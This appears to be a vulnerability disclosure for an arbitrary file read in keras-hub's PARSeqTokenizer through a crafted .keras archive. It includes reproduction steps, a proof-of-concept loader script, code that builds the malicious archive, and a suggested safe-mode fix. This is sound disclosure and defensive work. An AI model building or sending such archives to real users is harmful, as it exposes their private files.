PARSeqTokenizer Arbitrary File Read via Crafted .keras Archive

Vulnerability: keras_hub.models.PARSeqTokenizer reads an attacker-controlled file path from config.json during model deserialization with no safe mode guard.

Impact: Loading a crafted .keras file reads any file accessible to the process and exposes its content in model.vocabulary. safe_mode=True does not protect this path.

CVE status: No CVE assigned. Distinct from CVE-2025-12058 (keras core StringLookup) and not covered by keras-hub PR #2517 (which patched BytePair/WordPiece/SentencePiece but not PARSeqTokenizer).

Root cause

keras_hub/src/models/parseq/parseq_tokenizer.py:

def set_vocabulary(self, vocabulary):
    if isinstance(vocabulary, str):
        with open(vocabulary, "r", encoding="utf-8") as file:  # no in_safe_mode() check
            self.vocabulary = [line.rstrip() for line in file]
            self.vocabulary = "".join(self.vocabulary)
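In isolation, this pattern is a straightforward file-read primitive: any string is treated as a host filesystem path and its contents end up in the vocabulary attribute. A minimal standalone sketch, with no keras-hub dependency (the function below mirrors the vulnerable logic, not the real class):

```python
import os
import tempfile

def set_vocabulary_like(vocabulary):
    # Mirrors the vulnerable logic: a string is treated as a host path
    # and opened with no safe-mode check.
    if isinstance(vocabulary, str):
        with open(vocabulary, "r", encoding="utf-8") as file:
            lines = [line.rstrip() for line in file]
            return "".join(lines)
    return vocabulary

# Any file readable by the process works -- here a stand-in for a secret.
fd, path = tempfile.mkstemp()
with os.fdopen(fd, "w") as f:
    f.write("SECRET_ONE\nSECRET_TWO\n")

print(set_vocabulary_like(path))  # -> SECRET_ONESECRET_TWO
os.remove(path)
```

Note that the rstrip-then-join step concatenates all lines of the target file into a single string, which is exactly the shape seen later in model.vocabulary.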

Compare with the correctly patched BytePairTokenizer (PR #2517):

if isinstance(vocabulary, str):
    if serialization_lib.in_safe_mode():
        raise ValueError("Requested loading a vocabulary file outside model archive...")
    with open(vocabulary, "r", encoding="utf-8") as f:
        ...

Affected versions

keras-hub 0.25.0 and later (PARSeq was added in PR #2089, August 27, 2025). Live-confirmed on 0.25.1 (PyPI) and 0.29.0.dev0 (source).

Reproduction

Requirements:

pip install keras==3.12.1 keras-hub tensorflow

Step 1: Create the target file (simulates the victim's sensitive file):

echo -e "SENSITIVE_LINE_ONE\nSENSITIVE_LINE_TWO" > /tmp/parseq_poc_target.txt

Step 2: Run the PoC script:

# poc_parseq_file_read.py
import sys
from unittest.mock import MagicMock
sys.modules.setdefault("tensorflow_text", MagicMock())

import keras
import keras_hub  # required: registers keras_hub>PARSeqTokenizer

# The .keras file in this repo has vocabulary="/tmp/parseq_poc_target.txt"
model = keras.models.load_model("malicious_parseq.keras", safe_mode=True)
print("model.vocabulary:", repr(model.vocabulary))
# Prints the content of /tmp/parseq_poc_target.txt

Expected output (the [!] and [+] lines come from the full PoC script in this repo; the inline snippet above prints only the model.vocabulary line):

[!] load_model returned: <PARSeqTokenizer ...>
model.vocabulary: 'SENSITIVE_LINE_ONESENSITIVE_LINE_TWO'
[+] SUCCESS - file content read via safe_mode=True load_model()

Note on tensorflow_text: every keras-hub tokenizer calls assert_tf_libs_installed(), so the import must succeed before the tokenizer can be constructed. The MagicMock above satisfies that check without installing the package; in a real attack environment, both tensorflow and tensorflow-text are already installed.

Note on import keras_hub: keras_hub must be imported before load_model() to register the PARSeqTokenizer class in the Keras registry. This is standard in any environment using keras-hub models.

Full self-contained PoC

See poc_parseq_file_read.py in this repo. It dynamically creates a target file and a malicious archive, loads the model, and prints the leaked content.
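The archive-construction step can be sketched with the standard library alone. The config.json layout below follows the general Keras v3 saving format, but the exact PARSeqTokenizer serialization is an assumption here; consult a benignly saved tokenizer for the authoritative field layout:

```python
import json
import zipfile

def build_malicious_archive(out_path, target_path):
    # Approximate Keras v3 config layout. The inner "config" dict carries
    # the attacker-controlled vocabulary path that set_vocabulary() opens.
    config = {
        "module": "keras_hub.src.models.parseq.parseq_tokenizer",
        "class_name": "PARSeqTokenizer",
        "registered_name": "keras_hub>PARSeqTokenizer",
        "config": {"vocabulary": target_path},
    }
    with zipfile.ZipFile(out_path, "w") as zf:
        # Exactly three members: with no assets/ entries, load_assets() is
        # skipped, so nothing overwrites the attacker-supplied path.
        zf.writestr("config.json", json.dumps(config))
        zf.writestr("metadata.json", json.dumps({"keras_version": "3.12.1"}))
        zf.writestr("model.weights.npz", b"")  # placeholder weights blob

build_malicious_archive("malicious_parseq.keras", "/tmp/parseq_poc_target.txt")
```

The full PoC script additionally loads the resulting archive with safe_mode=True and prints the leaked content.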

Why safe_mode=True does not protect

The Keras deserializer (serialization_lib.py:816) resolves keras_hub classes unconditionally:

if package in {"keras", "keras_hub", "keras_cv", "keras_nlp"}:
    # class resolved without any safe_mode gate

SafeModeScope is active during from_config(), but PARSeqTokenizer.set_vocabulary() never calls in_safe_mode(). So the scope is a no-op for this code path.

Additionally, the archive has exactly 3 files (config.json, metadata.json, model.weights.npz). This causes saving_lib.py:484 to set asset_store = None, and saving_lib.py:806 to skip load_assets() entirely -- so no archive-embedded vocabulary overwrites the attacker-supplied path.
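The "no assets, no overwrite" condition can be checked mechanically. The function below is an approximation of the saving_lib behavior, not the real implementation: it reports whether an archive contains any entries under assets/, which is what determines whether an asset store is opened at all:

```python
import zipfile

def has_asset_store(keras_path):
    # Approximation of the saving_lib check: an asset store is only
    # relevant when the archive contains entries under "assets/".
    with zipfile.ZipFile(keras_path) as zf:
        return any(name.startswith("assets/") for name in zf.namelist())

# A three-member archive like the malicious one: no assets/ entries.
with zipfile.ZipFile("three_member.keras", "w") as zf:
    for name in ("config.json", "metadata.json", "model.weights.npz"):
        zf.writestr(name, b"")

print(has_asset_store("three_member.keras"))  # -> False
```

For such an archive, the load_assets() path never runs, so the vocabulary string from config.json reaches set_vocabulary() untouched.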

Suggested fix

Add an in_safe_mode() guard matching the pattern from PR #2517:

from keras_hub.src.saving import serialization_lib

def set_vocabulary(self, vocabulary):
    if isinstance(vocabulary, str):
        if serialization_lib.in_safe_mode():
            raise ValueError(
                "Requested loading a vocabulary file outside the model archive. "
                "Pass safe_mode=False if you trust the source."
            )
        with open(vocabulary, "r", encoding="utf-8") as file:
            ...